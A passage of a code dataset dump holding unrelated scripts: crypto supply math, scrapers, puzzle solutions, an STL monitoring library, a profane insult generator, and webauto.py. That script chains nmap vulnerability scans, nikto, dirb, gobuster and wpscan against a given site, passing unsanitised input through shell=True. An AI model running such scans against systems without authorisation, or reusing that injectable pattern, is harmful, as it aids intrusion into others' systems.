urlopen('https://www.bitstamp.net/api/ticker/').read()\nresultUrlPrice = json.loads(urlPrice)\ndollarPerBtc = float(resultUrlPrice['ask'])\n\nblockHalving = 210000\nfirstHalving = 210000\nsecondHalving = 420000\nthirdHalving = 630000\nfourthHalving = 840000\n\nhardCap = 21000000\n\ntotalCoins = 0\n\nif blockheight > firstHalving:\n\ttotalCoins = blockHalving * 50\n\nif blockheight > secondHalving:\n\ttotalCoins = totalCoins + blockHalving * 25\n\nif blockheight > thirdHalving:\n\ttotalCoins = totalCoins + blockHalving * 12.5\n\nelif blockheight < thirdHalving:\n\ttemp = blockheight - secondHalving\n\ttotalCoins = totalCoins + (temp * 12.5)\n\nif blockheight > fourthHalving:\n\ttotalCoins = totalCoins + blockHalving * 6.25\n\nelif blockheight < fourthHalving and blockheight > thirdHalving:\n\ttemp = blockheight - thirdHalving\n\ttotalCoins = totalCoins + (temp * 6.25)\n\npercentageMined = totalCoins / hardCap * 100\n\nprint (\"Bitcoins in circulation :\",f\"{int(totalCoins):,d}\",\", {0:.2f}%\".format(round(percentageMined,2)))\nprint (\"Bitcoins left to mine :\",f\"{int(hardCap - totalCoins):,d}\")\nprint (\"Market capitalization :\",f\"{int(totalCoins * dollarPerBtc):,d}$\")\n","sub_path":"pythonscripts/mintedcoins.py","file_name":"mintedcoins.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"129786986","text":"import bs4\nimport requests\nfrom bs4 import BeautifulSoup\nfrom lxml import html\n\nj = 0\ntplt = \"{0:{1}^10}\"\nurl='https://movie.douban.com/' # URL to scrape data from\npage=requests.Session().get(url) # keep one session alive\n#print(type(page))\ntree=html.fromstring(page.text) \n\n# when parsing the XML, convert the string into an element object (the root node of the parse tree)\nresult=tree.xpath('//td[@class=\"title\"]//a/text()') # extract the data we need\n\nprint(tplt.format(\"Movie_Name Top 10 of Week:\",chr(12288)))\nfor i in result:\n\tif j<10:\n\t\tprint(tplt.format(result[j],chr(12288)))\n\tj += 1\n\t#print(result)\n","sub_path":"python语言学习/网络爬虫/python爬虫之xpath的基本使用/电影网排行榜爬取.py","file_name":"电影网排行榜爬取.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"612611748","text":"#\r\n# [14] Longest Common Prefix\r\n#\r\n# https://leetcode.com/problems/longest-common-prefix/description/\r\n#\r\n# algorithms\r\n# Easy (31.73%)\r\n# Total Accepted:    290.6K\r\n# Total Submissions: 916K\r\n# Testcase Example:  '[\"flower\",\"flow\",\"flight\"]'\r\n#\r\n# Write a function to find the longest common prefix string amongst an array of\r\n# strings.\r\n# \r\n# If there is no common prefix, return an empty string \"\".\r\n# \r\n# Example 1:\r\n# \r\n# \r\n# Input: [\"flower\",\"flow\",\"flight\"]\r\n# Output: \"fl\"\r\n# \r\n# \r\n# Example 2:\r\n# \r\n# \r\n# Input: [\"dog\",\"racecar\",\"car\"]\r\n# Output: \"\"\r\n# Explanation: There is no common prefix among the input strings.\r\n# \r\n# \r\n# Note:\r\n# \r\n# All given inputs are in lowercase letters a-z.\r\n# \r\n#\r\nclass Solution:\r\n    def longestCommonPrefix(self, strs):\r\n        \"\"\"\r\n        :type strs: List[str]\r\n        :rtype: str\r\n        \"\"\"\r\n        i = 0\r\n        flag = 1\r\n        t = 0\r\n\r\n        if len(strs) == 0: \r\n            return \"\" \r\n\r\n        for s in strs:\r\n            if len(s) == 0:\r\n                return \"\"\r\n        \r\n        if len(strs) == 1:\r\n            return strs[0]\r\n\r\n        while i < len(strs[0]) + 1 and flag: \r\n            for s in strs[1:]:\r\n                if strs[0][:i+1] != s[:i+1]:\r\n                    flag *= 0 \r\n            i += 1\r\n        \r\n        if i >= 1: \r\n            return strs[0][:i-1]\r\n        elif i == 0:\r\n            return strs[0][0]\r\n        else:\r\n            return 
\"\"\r\n\r\nif __name__ == '__main__':\r\n print(Solution().longestCommonPrefix([\"cc\",\"\"]))\r\n","sub_path":"leetcode/14.longest-common-prefix.python3.py","file_name":"14.longest-common-prefix.python3.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"231465062","text":"import numpy as np\n\ndef kernel_matrix_from_file(path, max_len=-1):\n \"\"\"\n Builds the kernel matrix B from a file.\n File is assumed to store the vector b[i] in rows\n return B constructed as:\n 0, i< j\n B_{i,j} =\n b_{i-j}, i>=j\n \"\"\"\n kernelvec = np.loadtxt(path)[:max_len]\n kernel = np.zeros((len(kernelvec), len(kernelvec)))\n for i in range(len(kernelvec)):\n for j in range(len(kernelvec)):\n kernel[i, j] = kernelvec[i-j]\n del(kernelvec)\n return kernel\n\ndef kernel_from_list(kernel_path_list, max_len=-1):\n \"\"\"\n Builds kernel matrix for a list of kernel corrections\n\n Each kernel correction is loaded by kernel_matrix_from_file, format information can be found in the help of that function\n \"\"\"\n matrices = []\n for p in kernel_path_list:\n matrices.append(kernel_matrix_from_file(p, max_len))\n kernel = matrices[0]\n\n for m in matrices[1:]:\n kernel = np.dot(m, kernel)\n return kernel\n","sub_path":"pycqed/measurement/waveform_control/kernel_distortion_module.py","file_name":"kernel_distortion_module.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"19525029","text":"#A program to combine a swear word with an animal.\n#Based on the Thom Bee theory of the perfect insult.\nimport random\nimport time\nvar = 1\n\nfoul_lan = [\n\"piss\", \"shit\", \"fuck\", \"cunt\", \"cock\", \"clunge\", \"shite\", \"jizz\", \"cum\", \"muff\"\n\"panty\", \"minge\", \"wank\", \"trump\", \"bugger\", \"twat\", \"flap\", \"bum\", \"pussy\", \"sperm\",\n\"fart\", \"poo\", \"arse\"\n]\n\nanimals = [\n\"weasel\", \"snail\", \"kitten\", \"fox\", \"pup\", \"slug\", \"monkey\", \"whale\", \"pigeon\",\n\"fly\", \"falcoln\", \"hawk\", \"budgie\", \"ant\", \"womble\", \"cat\", \"dog\"\n]\n\nwhile var == 1:\n print (\"\"\"\n Let's receive a new insult to call your friends and nan.\n\n \"\"\"\n )\n time.sleep(2)\n swear = random.choice(foul_lan)\n suffix = random.choice(animals)\n print (swear + \" \" + suffix)\n time.sleep(2)\n go_again = input(\n \"\"\"\n\n Would you like to go again? Y/N...\n \"\"\"\n )\n go_again = go_again.lower\n if go_again()[0] is \"n\":\n var = 2\n print (\"Fuckity-bye\")\n time.sleep(3)\n","sub_path":"insult_algorithm.py","file_name":"insult_algorithm.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"206188319","text":"# Problem 112\n# ===========\n\n\n# Working from left-to-right if no digit is exceeded by the digit to its\n# left it is called an increasing number; for example, 134468.\n\n# Similarly if no digit is exceeded by the digit to its right it is called a\n# decreasing number; for example, 66420.\n\n# We shall call a positive integer that is neither increasing nor decreasing\n# a \"bouncy\" number; for example, 155349.\n\n# Clearly there cannot be any bouncy numbers below one-hundred, but just\n# over half of the numbers below one-thousand (525) are bouncy. 
In fact, the\n# least number for which the proportion of bouncy numbers first reaches 50%\n# is 538.\n\n# Surprisingly, bouncy numbers become more and more common and by the time\n# we reach 21780 the proportion of bouncy numbers is equal to 90%.\n\n# Find the least number for which the proportion of bouncy numbers is\n# exactly 99%.\n\n\n# Answer: 1587000 calculated in 2.86549806595 seconds\n\nfrom euler import runtime\nfrom itertools import count\n\n\ndef bouncy(n):\n d = []\n while n:\n d.append(n % 10)\n n /= 10\n for x in xrange(len(d)-1):\n if not d[x] <= d[x+1]:\n break\n else:\n return False\n for x in xrange(len(d)-1):\n if not d[x] >= d[x+1]:\n break\n else:\n return False\n return True\n\n\ndef problem_112(c=0):\n for n in count(1):\n if bouncy(n):\n c += 1\n if float(c)/n == 0.99:\n return n\n\nruntime(problem_112)\n","sub_path":"solutions/112.py","file_name":"112.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"635904655","text":"# monkeys (and number theory)\n\nfrom typing import Callable\n\n\nfilename = \"input.txt\"\n# filename = \"sample.txt\"\n\nwith open(filename, \"r\") as f:\n notes = [l.strip() for l in f.readlines()]\n\n\nclass Monkey:\n MOD = 1 << 30\n def __init__(self, index: int, notes: list[str]) -> None:\n self.items: list[int] = [int(n) for n in notes[index + 1].split(': ')[1].split(', ')]\n \n \n operation_line = notes[index + 2].split(' ')[-2:]\n if operation_line[0] == \"*\":\n if operation_line[1] == \"old\":\n operation = lambda n: n * n\n else:\n operation = lambda n: n * int(operation_line[1])\n else:\n operation = lambda n: n + int(operation_line[1])\n self.operation: Callable[[int], int] = operation\n\n self.test_cond_value = int(notes[index + 3].split(' ')[-1])\n test_cond = lambda n: n % self.test_cond_value == 0\n if_true = int(notes[index + 4].split(' ')[-1])\n if_false = int(notes[index + 5].split(' ')[-1])\n self.throw_to: Callable[[int], int] = lambda n: if_true if test_cond(n) else if_false\n\n self.relief: Callable[[int], int] = lambda n: n//3\n \n\n def add_item(self, item: int) -> None:\n self.items.append(item)\n\n\n def take_turn(self) -> list[list[int]]:\n throws: list[list[int]] = []\n\n for item in self.items:\n item = self.operation(item)\n item = self.relief(item)\n to = self.throw_to(item)\n throws.append([to, item])\n\n self.items.clear()\n\n return throws\n\n def get_test_cond_value(self) -> int:\n return self.test_cond_value\n\n def set_relief_func(self, l: Callable[[int], int]) -> None:\n self.relief = l\n\n\n\ndef first() -> int:\n monkeys: list[Monkey] = []\n \n for i_note in range(0, len(notes), 7):\n monkeys.append(Monkey(i_note, notes))\n \n inspections: list[int] = [0] * len(monkeys)\n\n for _ in range(20):\n for i_m, m in enumerate(monkeys):\n \n throws = m.take_turn()\n inspections[i_m] += len(throws)\n\n for to, item in throws:\n monkeys[to].add_item(item)\n\n inspections.sort()\n\n return inspections[-1] * inspections[-2]\n\n\ndef second() -> int:\n monkeys: list[Monkey] = []\n \n for i_note in range(0, len(notes), 7):\n monkeys.append(Monkey(i_note, notes))\n\n mod = 1\n for m in monkeys:\n mod *= m.get_test_cond_value()\n\n for m in monkeys:\n m.set_relief_func(lambda n: n % mod)\n \n inspections: list[int] = [0] * len(monkeys)\n\n for i in range(10000):\n\n for i_m, m in enumerate(monkeys):\n \n throws = m.take_turn()\n inspections[i_m] += len(throws)\n\n for to, item in throws:\n monkeys[to].add_item(item)\n\n 
inspections.sort()\n\n return inspections[-1] * inspections[-2]\n\n\nif __name__ == '__main__':\n print(first())\n print(second())\n","sub_path":"2022/day 11/m.py","file_name":"m.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"351958961","text":"import mongoengine\nfrom doc_struct import Game\n\nmongoengine.connect(\"nba\")\n\n\ndef updating_game_scores():\n \"\"\"\n Query The database for games without a home team score and the date is earlier then the current ISO\n\n Atomic update of the documents score scraping the specific URL\n\n \"\"\"\n home_wins = Game.objects().filter()\n for game in home_wins:\n print(home_wins.home_team)\n\nupdating_game_scores()\n","sub_path":"updating.py","file_name":"updating.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"372792720","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 21 20:32:57 2019\n\n@author: NickovicD\n\"\"\"\n\nimport logging\nimport importlib\nimport operator\n\nfrom antlr4 import *\nfrom antlr4.InputStream import InputStream\n\nfrom rtamt.spec.abstract_specification import AbstractSpecification\n\nfrom rtamt.parser.stl.StlLexer import StlLexer\nfrom rtamt.parser.stl.StlParser import StlParser\nfrom rtamt.parser.stl.StlParserVisitor import StlParserVisitor\n\nfrom rtamt.parser.stl.error.parser_error_listener import STLParserErrorListener\nfrom rtamt.exception.stl.exception import STLParseException\nfrom rtamt.exception.stl.exception import STLOfflineException\n\nfrom rtamt.spec.stl.node_visitor import STLNodeVisitor\nfrom rtamt.spec.stl.pastifier import STLPastifier\nfrom rtamt.spec.stl.evaluator import STLEvaluator\n\n\nclass STLSpecification(AbstractSpecification,StlParserVisitor):\n \"\"\"A class used as a container for STL specifications\n\n Attributes:\n name : String\n\n vars : set(String) - set of variable names\n free_vars : set(String) - set of free variable names\n\n var_object_dict : dict(String,AbstractNode) - dictionary that maps variable names to their Node instances\n modules : dict(String,String) - dictionary that maps module paths to module names\n\n top : AbstractNode - pointer to the specification parse tree\n\n evaluator : AbstractEvaluator - pointer to the object that implements the monitoring algorithm\n \"\"\"\n def __init__(self, is_pure_python = True):\n \"\"\"Constructor for STL Specification\"\"\"\n super(STLSpecification, self).__init__(is_pure_python)\n self.name = 'STL Specification'\n self.visitor = STLNodeVisitor(self)\n\n\n # Parses the STL property\n # string can be either file path containint the STL property\n # or the textual property itself\n def parse(self):\n if self.spec is None:\n raise STLParseException ('STL specification if empty')\n\n # Parse the STL spec - ANTLR4 magic\n input_stream = InputStream(self.spec)\n lexer = StlLexer(input_stream)\n stream = CommonTokenStream(lexer)\n parser = StlParser(stream)\n parser._listeners = [STLParserErrorListener()]\n ctx = parser.stlfile()\n\n # Visit the parse tree and populate spec fields\n self.visitStlfile(ctx)\n\n # Create the visitor for the actual spec nodes\n self.top = self.visitor.visitStlfile(ctx)\n\n # Translate bounded future STL to past STL\n pastifier = STLPastifier(self)\n self.top.accept(pastifier)\n past = pastifier.pastify(self.top)\n self.top = past\n\n # Initialize the evaluator\n self.evaluator = STLEvaluator(self)\n 
self.top.accept(self.evaluator)\n\n def update(self, *args, **kargs):\n time_index = args[0]\n signals = args[1]\n for arg in signals:\n var_name = arg[0]\n var_object = arg[1]\n self.var_object_dict[var_name] = var_object\n\n return self.evaluator.evaluate(self.top, [time_index])\n\n # This is the visitor part. We will populate\n def visitStlSpecification(self, ctx):\n self.visitChildren(ctx)\n # self.top = self.visitor.visitAssertion(ctx.assertion())\n\n def visitSpecification(self, ctx):\n self.visitChildren(ctx)\n # The specification name is updated only if it is given\n # by the user\n if not ctx.Identifier() is None:\n self.name = ctx.Identifier().getText()\n\n def visitAssertion(self, ctx):\n self.visitChildren(ctx)\n id = ctx.Identifier().getText();\n id_tokens = id.split('.')\n id_head = id_tokens[0]\n id_tokens.pop(0)\n id_tail = '.'.join(id_tokens)\n\n try:\n var = self.var_object_dict[id_head]\n if (not id_tail):\n if (not isinstance(var, (int, float))):\n raise STLParseException('Variable {} is not of type int or float'.format(id))\n else:\n try:\n value = operator.attrgetter(id_tail)(var)\n if (not isinstance(value, (int, float))):\n raise STLParseException(\n 'The field {0} of the variable {1} is not of type int or float'.format(id, id_head))\n except AttributeError as err:\n raise STLParseException(err)\n except KeyError:\n if id_tail:\n raise STLParseException('{0} refers to undeclared variable {1} of unknown type'.format(id, id_head))\n else:\n var = float()\n self.var_object_dict[id] = var\n self.add_var(id)\n logging.warning('The variable {} is not explicitely declared. It is implicitely declared as a '\n 'variable of type float'.format(id))\n\n self.out_var = id_head;\n self.out_var_field = id_tail;\n self.free_vars.discard(id_head)\n\n def visitVariableDeclaration(self, ctx):\n # fetch the variable name, type and io signature\n var_name = ctx.identifier().getText()\n var_type = ctx.domainType().getText()\n\n self.declare_var(var_name, var_type)\n self.var_io_dict[var_name] = 'output'\n\n self.visitChildren(ctx)\n\n def visitRosTopic(self, ctx):\n var_name = ctx.Identifier(0).getText()\n topic_name = ctx.Identifier(1).getText()\n self.set_var_topic(var_name, topic_name)\n\n def visitModImport(self, ctx):\n module_name = ctx.Identifier(0).getText()\n var_type = ctx.Identifier(1).getText()\n self.import_module(module_name, var_type)\n\n def create_var_from_name(self, var_name):\n var = None\n var_type = self.var_type_dict[var_name]\n if var_type.encode('utf-8') == 'float'.encode('utf-8'):\n var = float()\n elif var_type.encode('utf-8') == 'int'.encode('utf-8'):\n var = int()\n elif var_type.encode('utf-8') == 'complex'.encode('utf-8'):\n var = complex()\n else:\n try:\n var_module = self.modules[var_type]\n class_ = getattr(var_module, var_type)\n var = class_()\n except KeyError:\n raise STLParseException ('The type {} does not seem to be imported.'.format(var_type))\n return var\n\n def import_module(self, from_name, module_name):\n try:\n module = importlib.import_module(from_name)\n self.modules[module_name] = module\n except ImportError:\n raise STLParseException ('The module {} cannot be loaded'.format(from_name))\n\n def declare_var(self, var_name, var_type):\n if var_name in self.vars:\n logging.warning('Variable {} was already declared. 
It is now overriden with the new declaration.'.format(var_name))\n\n # Associate to variable name 'var' its type 'type'\n self.var_type_dict[var_name] = var_type\n\n # Add variable name 'var' to the set of variables\n self.add_var(var_name)\n self.free_vars.add(var_name)\n instance = self.create_var_from_name(var_name)\n self.var_object_dict[var_name] = instance\n\n # Add the default variable topic to var\n self.var_topic_dict[var_name] = 'rtamt/{}'.format(var_name)\n\n self.var_io_dict[var_name] = 'output'\n\n def set_var_topic(self, var_name, var_topic):\n if not var_name in self.vars:\n logging.warning(\n 'The variable {0} is not declared. Setting its topic name to {1} is ignored.'.format(var_name,\n var_topic))\n else:\n topic = self.var_topic_dict[var_name]\n self.var_topic_dict[var_name] = var_topic\n\n def offline(self, dataset):\n counter = 0\n prev_signal_length = 0\n signal_length = 0\n out = 0\n\n for var_name in dataset:\n signal_length = len(dataset[var_name])\n if counter > 0 and not (signal_length == prev_signal_length):\n raise STLOfflineException('Input signals have different length')\n prev_signal_length = signal_length\n counter = counter + 1\n\n for i in range(signal_length):\n signal_snapshot = []\n counter = 0\n prev_time = 0\n for var_name in dataset:\n signal = dataset[var_name]\n sample = signal[i]\n time = sample[0]\n value = sample[1]\n if counter > 0 and not (time == prev_time):\n raise STLOfflineException('The time indices do not agree')\n signal_snapshot.append((var_name, value))\n counter = counter + 1\n prev_time = time\n out = self.update(time, signal_snapshot)\n\n return out\n\n\n\n\n\n\n","sub_path":"rtamt/spec/stl/specification.py","file_name":"specification.py","file_ext":"py","file_size_in_byte":8931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"204483588","text":"\n\nfrom xai.brain.wordbase.nouns._birdie import _BIRDIE\n\n#calss header\nclass _BIRDIEING(_BIRDIE, ):\n\tdef __init__(self,): \n\t\t_BIRDIE.__init__(self)\n\t\tself.name = \"BIRDIEING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"birdie\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_birdieing.py","file_name":"_birdieing.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"557366027","text":"import math\ndef solution(n):\n #print(\"{0:b}\".format(n))\n m=0\n cnt= 0\n ingap =False\n p = 0\n r = n % 2\n q = int(math.ceil(n / 2))\n if q == 1:\n return 0\n if r == 1:\n ingap = True\n while q >=1:\n #print(q, r)\n if ingap and r == 1:\n ingap = False\n m = max(m, cnt)\n elif ingap and r == 0:\n cnt+=1\n elif not ingap and r == 1:\n ingap = True\n cnt = 0\n elif not ingap and r == 0:\n if p == 1:\n ingap = True\n cnt = 1\n p = r\n r = q % 2\n q = int(math.ceil(q / 2))\n\n return max(m,cnt)\ndef main():\n testcases = [1,3,4,5,41,1041]\n for i in range(len(testcases)):\n tc = testcases[i]\n print(tc, solution(tc))\nif __name__ == '__main__':\n main()","sub_path":"binarygap.py","file_name":"binarygap.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"394972567","text":"from colorama import Fore, Back, Style\nfrom os import path\nfrom fake_useragent import UserAgent\nimport dns.resolver\nimport sys, subprocess, time, socket, io, re, requests\n\n# by c0d3Ninja\n\nif len(sys.argv) !=2:\n print (\"python3 automate.py Site\")\n 
sys.exit(1)\n\nsite = sys.argv[1]\n\n# Convert URL to site.com by stripping down \"http://www.\" and \"https://www.\"\n\nif site[0:5] == \"https\":\n dotcom = site[12:]\n dotcom = dotcom.replace(\"/\",\"\")\nelif site[0:4] == 'http':\n dotcom = site[11:]\n dotcom = dotcom.replace(\"/\", \"\")\n\nip = socket.gethostbyname(dotcom)\n\n# Check if the site is available\n\ndef sitestatus():\n try:\n print(\"Checking if the site is up...\")\n ua = UserAgent()\n header = {'User-Agent':str(ua.chrome)}\t\t\n response = requests.get(site, headers=header)\n if response.status_code == 200:\n print (Fore.GREEN + \"Site: {} is up!\".format(site))\n elif response.status_code == 400:\n print (Fore.RED + \"Bad Request\")\n elif response.status_code == 404:\n print (Fore.RED + \"Not Found\")\n elif response.status_code == 403:\n print (Fore.RED + \"Forbidden\")\n elif response.status_code == 405:\n print (Fore.RED + \"Method not allowed\")\n elif response.status_code == 404:\n print (Fore.RED + \"Not Found\")\n elif response.status_code == 423:\n print (Fore.RED + \"LOCKED\")\n elif response.status_code == 429:\n print (Fore.RED + \"Too many requests\")\n elif response.status_code == 499:\n print (Fore.RED + \"Client closed request\")\n elif response.status_code == 500:\n print (Fore.RED + \"Server error\")\n elif response.status_code == 501:\n print (Fore.RED + \"Not implemented\")\n elif response.status_code == 502:\n print (Fore.RED + \"Bad Gateway\")\n elif response.status_code == 503:\n print (Fore.RED + \"Service Unavailable\")\n elif response.status_code == 511:\n print (Fore.RED + \"Network Authentication Required\")\n elif response.status_code == 599:\n print (Fore.RED + \"Network Connect Timeout Error\")\n except requests.exceptions.MissingSchema:\n print (Fore.GREEN + \"Please use: http://site.com\")\t\n except requests.exceptions.ConnectionError:\n print (Fore.RED + \"name or service not known\")\n\n# Tools \n\ndef nmapSCAN():\n print (\"================ RUNNING PORT SCAN ON PORT 80,8080,443 ================\" + \"\\n\")\n nmap = \"nmap -sV -T5 -p80,8080,443 \"\n commands(nmap + ip + \"\\n\")\n\ndef nmapvulnSCAN():\n print (\"================ RUNNING a vulnerability scan with Nmap ================\" + \"\\n\")\n nmap = \"nmap --script vuln -p80,8080,443 -T5 \"\n commands(nmap + ip + \"\\n\")\n\ndef sublist3rSCAN():\n sublist3r = \"cd Sublist3r; python3 sublist3r.py -d\" \n commands(sublist3r + \" \" + dotcom + \"\\n\")\n\ndef niktoSCAN():\n nikto = \"nikto -h \"\n commands(nikto + site + \"\\n\")\n\ndef dirbSCAN():\n dirb = \"dirb \"\n commands(dirb + site + \"\\n\")\n\ndef whatwebSCAN():\n whatweb = \"whatweb -v \"\n commands(whatweb + site + \"\\n\")\n\ndef wafw00fSCAN():\n wafw00f = \"wafw00f \"\n commands(wafw00f + site + \"\\n\")\n\ndef knockpySCAN():\n knockpy = \"knockpy \"\n commands(knockpy + site + \"\\n\")\n\ndef gobusterSCAN():\n gobuster = \"gobuster dir -u \"\n commands(gobuster + site + \" -w /usr/share/dirb/wordlists/big.txt -t 40 -x .php,.txt,.html\" + \"\\n\")\n\ndef wpscanSCAN():\n wpscan = \"wpscan --url \"\n print (\"...Checking for wordpress...\" + \"\\n\")\n commands(wpscan + site)\n\n# Banners\n\nbanner = \"\"\"\n\n\n██╗ ██╗███████╗██████╗ █████╗ ██╗ ██╗████████╗ ██████╗ \n██║ ██║██╔════╝██╔══██╗ ██╔══██╗██║ ██║╚══██╔══╝██╔═══██╗\n██║ █╗ ██║█████╗ ██████╔╝ ███████║██║ ██║ ██║ ██║ ██║\n██║███╗██║██╔══╝ ██╔══██╗ ██╔══██║██║ ██║ ██║ ██║ ██║\n╚███╔███╔╝███████╗██████╔╝ ██║ ██║╚██████╔╝ ██║ ╚██████╔╝\n ╚══╝╚══╝ ╚══════╝╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ v0.1\n\nby 
c0deninja\n\"\"\"\n\ntools = \"\"\"\n--------------------------------------------------------------------------------\n\n████████╗ ██████╗ ██████╗ ██╗ ███████╗\n╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██╔════╝\n ██║ ██║ ██║██║ ██║██║ ███████╗\n ██║ ██║ ██║██║ ██║██║ ╚════██║\n ██║ ╚██████╔╝╚██████╔╝███████╗███████║\n ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝\n\n\"\"\"\n\n\nprint (Fore.WHITE + banner)\n\nsitestatus()\n\nprint (\"\\n\")\n\nprint (tools)\n\n# This script will work best on Kali Linux or Parrot OS\n# Please install the tools that you need before using this script.\n\nprint (Fore.WHITE)\n\ndef commands(cmd):\n try:\n subprocess.check_call(cmd, shell=True)\n except:\n pass\n\n# scanners / tools\n# you can comment out the tools you don't want to use\n\ndef scanning(site):\n start = time.time()\n\n nmapSCAN()\n nmapvulnSCAN()\n niktoSCAN()\n dirbSCAN()\n whatwebSCAN()\n wafw00fSCAN()\n sublist3rSCAN()\n #knockpySCAN()\n gobusterSCAN()\n wpscanSCAN()\n\n end = time.time()\n \n print (\"\\n\")\n print (end - start)\n\nscanning(site)\n","sub_path":"webauto.py","file_name":"webauto.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"291060799","text":"import datetime\nimport tempfile\nimport os\nimport socket\nimport traceback\nfrom sh import which\n\nfrom openeye import oechem\n\nimport psi4\n\nfrom datarecord import OEMolRecord\nfrom floe.api import (\n ParallelMixin,\n StringParameter,\n IntegerParameter,\n BooleanParameter,\n DecimalParameter,\n)\nfrom cuberecord.cubes import OEMolRecordCube, InOutMolFieldMixin\nfrom cuberecord.ports import RecordOutputPort\n\nfrom torsion.utils import get_sd_data, write_energy_profile_to_sddata, save_sddata\nfrom torsion.core import get_dihedral, calculate_energy\n\n\nclass Psi4EnergyCalculation(OEMolRecordCube, InOutMolFieldMixin):\n \"\"\"Calculate the energy using psi4 for a single conformer.\n \"\"\"\n\n title = \"PSI4 Energy Calculation (Serial)\"\n description = \"\"\"Flexible 3rd party QM engine. 
Allows a variety of calculations, methods and basis sets using\n the trusted DFT code from Dave Sherill's group at Georgia Tech.\"\"\"\n classification = [[\"Energetics\", \"DFT\", \"PSI4\"]]\n tags = [tag for tag_list in classification for tag in tag_list]\n\n system_failure = RecordOutputPort(\"system_failure\")\n\n spe_method = StringParameter(\n \"spe_method\",\n title=\"Method for QM Single-point Energy Calculation\",\n default=\"B3LYP\",\n choices=[\n \"SCF\",\n \"B3LYP\",\n \"B3LYP-D\",\n \"B2PLYP\",\n \"B97\",\n \"B97-D\",\n \"PBE-D\",\n \"CCSD\",\n \"SAPT0\",\n \"MP2\",\n \"MP4\",\n \"HF\",\n \"hf3c\",\n \"hf-d3bj\",\n \"pbeh3c\",\n ],\n description=\"QM method for the final single-point calculation\",\n )\n\n spe_basis = StringParameter(\n \"spe_basis\",\n title=\"Basis Set for QM Single-point Energy Calculation\",\n default=\"6-31G**\",\n choices=[\n None,\n \"cc-pVDZ\",\n \"cc-pVTZ\",\n \"cc-pVQZ\",\n \"aug-cc-pVDZ\",\n \"aug-cc-pVTZ\",\n \"minix\",\n \"sto-3g\",\n \"3-21G\",\n \"6-31G\",\n \"6-31G*\",\n \"6-31G**\",\n \"6-31+G*\",\n \"6-31+G**\",\n \"6-31++G*\",\n \"6-31++G**\",\n \"6-311+G**\",\n ],\n description=\"The basis set for the final single-point calculation\",\n )\n\n geom_opt_technique = StringParameter(\n \"geom_opt_technique\",\n title=\"Type of Geometry Optimization\",\n default=\"QM\",\n choices=[\"None\", \"QM\"],\n )\n\n opt_method = StringParameter(\n \"opt_method\",\n title=\"Method for QM Geometry Optimization\",\n default=\"B3LYP\",\n choices=[\n \"SCF\",\n \"B3LYP\",\n \"B3LYP-D\",\n \"B97\",\n \"B97-D\",\n \"PBE-D\",\n \"CCSD\",\n \"SAPT0\",\n \"MP2\",\n \"MP4\",\n \"HF\",\n \"hf3c\",\n \"hf-d3bj\",\n \"pbeh3c\",\n ],\n description=\"QM method for the initial optimization\",\n )\n\n opt_basis = StringParameter(\n \"opt_basis\",\n title=\"Basis Set for QM Geometry Optimization\",\n default=\"6-31G*\",\n choices=[\n None,\n \"cc-pVDZ\",\n \"cc-pVTZ\",\n \"cc-pVQZ\",\n \"aug-cc-pVDZ\",\n \"aug-cc-pVTZ\",\n \"minix\",\n \"sto-3g\",\n \"3-21G\",\n \"6-31G\",\n \"6-31G*\",\n \"6-31G**\",\n \"6-31+G*\",\n \"6-31+G**\",\n \"6-31++G*\",\n \"6-31++G**\",\n \"6-311+G**\",\n ],\n description=\"The basis set for the initial optimization.\",\n )\n\n geom_maxiter = IntegerParameter(\n \"geom_maxiter\",\n title=\"Maximum number of geometry optimization steps.\",\n default=100,\n min_value=1,\n max_value=1000,\n description=\"\"\"Maximum number of geometry optimization steps.\"\"\",\n )\n\n dft_radial_points = IntegerParameter(\n \"dft_radial_points\",\n title=\"DFT Grid Radial Points\",\n default=50,\n min_value=25,\n max_value=500,\n description=\"\"\"Parameter controls the radial density of the DFT grid. DFT calculation speeds are very\n sensitive to this parameter.\"\"\",\n )\n\n dft_spherical_points = IntegerParameter(\n \"dft_spherical_points\",\n title=\"DFT GRid Spherical Points\",\n default=194,\n min_value=25,\n max_value=500,\n description=\"\"\"Parameter controls the spherical density of the DFT grid. DFT calculation speeds are sensitive\n to this parameter.\"\"\",\n )\n\n num_processors = IntegerParameter(\n \"num_processors\",\n title=\"Number of Processors\",\n default=1,\n min_value=0,\n max_value=32,\n help_text=\"\"\"Number of processors 1-32 (0 indicates to use all the processors on the machine). This is the\n Number of processors for each Orion worker instance. 
